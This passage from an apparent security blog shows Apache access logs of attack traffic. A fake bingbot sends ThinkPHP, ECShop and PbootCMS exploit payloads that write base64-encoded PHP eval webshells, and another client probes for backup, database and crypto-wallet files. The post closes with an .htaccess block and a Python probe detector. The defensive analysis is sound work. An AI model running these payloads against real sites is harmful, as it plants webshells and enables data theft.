7%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%7
5%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "POST //index.php?s=index HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:15 -0700] "GET //d.php HTTP/1.1" 404 419 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //i.php HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:20 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:24 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:29 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:37 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:41 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

142.252.249.27 is Scanning for Crypto Wallets and Backups

Found a log entry from 142.252.249.27 this morning:

142.252.249.27 - - [09/Sep/2019:07:59:18 -0700] "HEAD /backup.zip HTTP/1.1" 404 4128 "http://www.freefixer.com/backup.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

The bot running at 142.252.249.27 is scanning freefixer.com for backups, databases, data, code, bitcoin wallets, bitcoin cash wallets, litecoin wallets, dogecoin wallets, etc. It looks for various file formats such as .zip, .rar, .dat, .7z, .sql, .mdb, .mdf, .tgz and .tar.gz. Here’s the complete list of requests that 142.252.249.27 made:

 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /wallet.zip
 HEAD /wallet.rar
 HEAD /wallet.dat
 HEAD /wallet.7z
 HEAD /wallet.sql
 HEAD /wallet.mdb
 HEAD /wallet.mdf
 HEAD /wallet.tgz
 HEAD /wallet.tar.gz
 HEAD /wallet.backup.zip
 HEAD /wallet.backup.rar
 HEAD /wallet.backup.dat
 HEAD /wallet.backup.7z
 HEAD /wallet.backup.sql
 HEAD /wallet.backup.mdb
 HEAD /wallet.backup.mdf
 HEAD /wallet.backup.tgz
 HEAD /wallet.backup.tar.gz
 HEAD /litecoin.zip
 HEAD /litecoin.rar
 HEAD /litecoin.dat
 HEAD /litecoin.7z
 HEAD /litecoin.sql
 HEAD /litecoin.mdb
 HEAD /litecoin.mdf
 HEAD /litecoin.tgz
 HEAD /litecoin.tar.gz
 HEAD /Litecoin.zip
 HEAD /Litecoin.rar
 HEAD /Litecoin.dat
 HEAD /Litecoin.7z
 HEAD /Litecoin.sql
 HEAD /Litecoin.mdb
 HEAD /Litecoin.mdf
 HEAD /Litecoin.tgz
 HEAD /Litecoin.tar.gz
 HEAD /Bitcoin.zip
 HEAD /Bitcoin.rar
 HEAD /Bitcoin.dat
 HEAD /Bitcoin.7z
 HEAD /Bitcoin.sql
 HEAD /Bitcoin.mdb
 HEAD /Bitcoin.mdf
 HEAD /Bitcoin.tgz
 HEAD /Bitcoin.tar.gz
 HEAD /bitcoin.zip
 HEAD /bitcoin.rar
 HEAD /bitcoin.dat
 HEAD /bitcoin.7z
 HEAD /bitcoin.sql
 HEAD /bitcoin.mdb
 HEAD /bitcoin.mdf
 HEAD /bitcoin.tgz
 HEAD /bitcoin.tar.gz
 HEAD /HShare.zip
 HEAD /HShare.rar
 HEAD /HShare.dat
 HEAD /HShare.7z
 HEAD /HShare.sql
 HEAD /HShare.mdb
 HEAD /HShare.mdf
 HEAD /HShare.tgz
 HEAD /HShare.tar.gz
 HEAD /btc.zip
 HEAD /btc.rar
 HEAD /btc.dat
 HEAD /btc.7z
 HEAD /btc.sql
 HEAD /btc.mdb
 HEAD /btc.mdf
 HEAD /btc.tgz
 HEAD /btc.tar.gz
 HEAD /bch.zip
 HEAD /bch.rar
 HEAD /bch.dat
 HEAD /bch.7z
 HEAD /bch.sql
 HEAD /bch.mdb
 HEAD /bch.mdf
 HEAD /bch.tgz
 HEAD /bch.tar.gz
 HEAD /btm.zip
 HEAD /btm.rar
 HEAD /btm.dat
 HEAD /btm.mdb
 HEAD /btm.mdf
 HEAD /btm.tgz
 HEAD /btm.tar.gz
 HEAD /bcd.zip
 HEAD /bcd.rar
 HEAD /bcd.dat
 HEAD /bcd.7z
 HEAD /bcd.sql
 HEAD /bcd.mdb
 HEAD /bcd.mdf
 HEAD /bcd.tgz
 HEAD /bcd.tar.gz
 HEAD /bcx.zip
 HEAD /bcx.rar
 HEAD /bcx.dat
 HEAD /bcx.7z
 HEAD /bcx.sql
 HEAD /bcx.mdb
 HEAD /bcx.mdf
 HEAD /bcx.tgz
 HEAD /bcx.tar.gz
 HEAD /qianbao.zip
 HEAD /qianbao.rar
 HEAD /qianbao.dat
 HEAD /qianbao.7z
 HEAD /qianbao.sql
 HEAD /qianbao.mdb
 HEAD /qianbao.mdf
 HEAD /qianbao.tgz
 HEAD /qianbao.tar.gz
 HEAD /doge.zip
 HEAD /doge.rar
 HEAD /doge.dat
 HEAD /doge.7z
 HEAD /doge.sql
 HEAD /doge.mdb
 HEAD /doge.mdf
 HEAD /doge.tgz
 HEAD /doge.tar.gz
 HEAD /dogecoin.zip
 HEAD /dogecoin.rar
 HEAD /dogecoin.dat
 HEAD /dogecoin.7z
 HEAD /dogecoin.sql
 HEAD /dogecoin.mdb
 HEAD /dogecoin.mdf
 HEAD /dogecoin.tgz
 HEAD /dogecoin.tar.gz
 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /bf.zip
 HEAD /bf.rar
 HEAD /bf.dat
 HEAD /bf.7z
 HEAD /bf.sql
 HEAD /bf.mdb
 HEAD /bf.mdf
 HEAD /bf.tgz
 HEAD /bf.tar.gz
 HEAD /beifen.zip
 HEAD /beifen.rar
 HEAD /beifen.dat
 HEAD /beifen.7z
 HEAD /beifen.sql
 HEAD /beifen.mdb
 HEAD /beifen.mdf
 HEAD /beifen.tgz
 HEAD /beifen.tar.gz
 HEAD /shujuku.zip
 HEAD /shujuku.rar
 HEAD /shujuku.dat
 HEAD /shujuku.7z
 HEAD /shujuku.sql
 HEAD /shujuku.mdb
 HEAD /shujuku.mdf
 HEAD /shujuku.tgz
 HEAD /shujuku.tar.gz
 HEAD /shuju.zip
 HEAD /shuju.rar
 HEAD /shuju.dat
 HEAD /shuju.7z
 HEAD /shuju.sql
 HEAD /shuju.mdb
 HEAD /shuju.mdf
 HEAD /shuju.tgz
 HEAD /shuju.tar.gz
 HEAD /ziliao.zip
 HEAD /ziliao.rar
 HEAD /ziliao.dat
 HEAD /ziliao.7z
 HEAD /ziliao.sql
 HEAD /ziliao.mdb
 HEAD /ziliao.mdf
 HEAD /ziliao.tgz
 HEAD /ziliao.tar.gz
 HEAD /freefixer.zip
 HEAD /freefixer.com.zip
 HEAD /www.freefixer.com.zip
 HEAD /freefixer.rar
 HEAD /freefixer.com.rar
 HEAD /www.freefixer.com.rar
 HEAD /freefixer.dat
 HEAD /freefixer.com.dat
 HEAD /www.freefixer.com.dat
 HEAD /freefixer.7z
 HEAD /freefixer.com.7z
 HEAD /www.freefixer.com.7z
 HEAD /freefixer.sql
 HEAD /freefixer.com.sql
 HEAD /www.freefixer.com.sql
 HEAD /freefixer.mdb
 HEAD /freefixer.com.mdb
 HEAD /www.freefixer.com.mdb
 HEAD /freefixer.mdf
 HEAD /freefixer.com.mdf
 HEAD /www.freefixer.com.mdf
 HEAD /freefixer.tgz
 HEAD /freefixer.com.tgz
 HEAD /www.freefixer.com.tgz
 HEAD /freefixer.tar.gz
 HEAD /freefixer.com.tar.gz
 HEAD /www.freefixer.com.tar.gz

Vanta Telecommunications Limited and egihosting.com are the names that showed up when I did a lookup in the ARIN registry, as shown in the screenshot below. I’m assuming one of their customers has been hacked.

If you’ve been following this blog for the last week you know that I’ve been trying to weed out fake Bingbots, Yandexbots and Googlebots and other types of bad behaviour. Since 142.252.249.27 is currently trying to gain access to non-public information I’m going to block it in Apache’s .htaccess file.
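One way to spot this kind of sweep in an access log, check whether any probe was actually answered, and produce the block rules, as an added example (not the blog author's code). The sample log lines and the 198.51.100.7 / 203.0.113.10 addresses are constructed, the five-path threshold is an assumption, and the emitted rules assume Apache 2.4 with mod_authz_core.

```python
import re
from collections import defaultdict

# Apache combined log format, the shape of the log lines quoted on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions the scanner requested, taken from the request list above.
PROBE_EXT = (".zip", ".rar", ".dat", ".7z", ".sql", ".mdb", ".mdf", ".tgz", ".tar.gz")


def find_backup_scanners(lines, min_paths=5):
    """Flag clients that asked for at least min_paths distinct missing dump files.

    Returns {ip: {"probed": [404 paths], "served": [paths answered with 2xx]}}.
    The "served" list is what to check first: a probe that found a real file.
    """
    probed, served = defaultdict(set), defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = m["path"].split("?", 1)[0]
        if not path.lower().endswith(PROBE_EXT):
            continue
        if m["status"] == "404":
            probed[m["ip"]].add(path)
        elif m["status"].startswith("2"):
            served[m["ip"]].append(path)
    return {ip: {"probed": sorted(paths), "served": served[ip]}
            for ip, paths in probed.items() if len(paths) >= min_paths}


def htaccess_block(ips):
    """Render Apache 2.4 (mod_authz_core) rules that deny the given addresses."""
    rules = ["<RequireAll>", "    Require all granted"]
    rules += [f"    Require not ip {ip}" for ip in sorted(ips)]
    return "\n".join(rules + ["</RequireAll>"])


def _line(ip, method, path, status):
    # Builds one constructed log line; addresses are RFC 5737 documentation ranges.
    return (f'{ip} - - [09/Sep/2019:07:59:18 -0700] "{method} {path} HTTP/1.1" '
            f'{status} 4128 "-" "Mozilla/5.0 (compatible; MSIE 9.0)"')


# Constructed sample: one scanner, one ordinary visitor.
SAMPLE_LOG = (
    [_line("198.51.100.7", "HEAD", f"/{name}{ext}", 404)
     for name in ("backup", "wallet") for ext in (".zip", ".sql", ".tar.gz")]
    + [_line("198.51.100.7", "HEAD", "/db.sql", 200),             # probe that found a file
       _line("203.0.113.10", "GET", "/downloads/setup.zip", 200),  # normal download
       _line("203.0.113.10", "GET", "/old.zip", 404)]              # one stray 404
)

if __name__ == "__main__":
    hits = find_backup_scanners(SAMPLE_LOG)
    for ip, info in hits.items():
        print(ip, len(info["probed"]), "probes; served:", info["served"])
    print(htaccess_block(hits))
```

A non-empty "served" list means a guessed file name exists under the web root and was returned, which matters more than the block itself.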